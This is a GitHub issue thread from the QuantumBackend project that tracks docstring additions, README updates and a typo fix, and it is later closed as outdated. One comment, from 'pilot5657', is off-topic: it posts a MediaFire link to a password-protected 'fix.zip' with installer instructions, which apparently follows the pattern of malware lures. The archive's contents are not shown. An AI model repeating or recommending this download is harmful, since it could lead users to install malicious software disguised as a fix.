### ISSUE TITLE
Documentation Update + Correcting Typo

### ISSUE THREAD

**Issue by Scrubzie** [Clusterpuck/QuantumBackend#87]
Add doc strings for these
- ~distance_factory.py~
- ~solver_factory.py~
- ~vehicle_clusterer_factory.py~
- ~app.py~
- mapbox_distance_finder.py
- ~tsp_formulation.py~
- ~brute_force_solver.py~

Update ReadMes
- ~route_solver's README~
- distance_matrix's README
- route_optimisation README

Correct Typo
- ~time_times in tsp_formulation.py~

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sonny6155** [comment]
Outdated. Remaining work will be covered by #98.
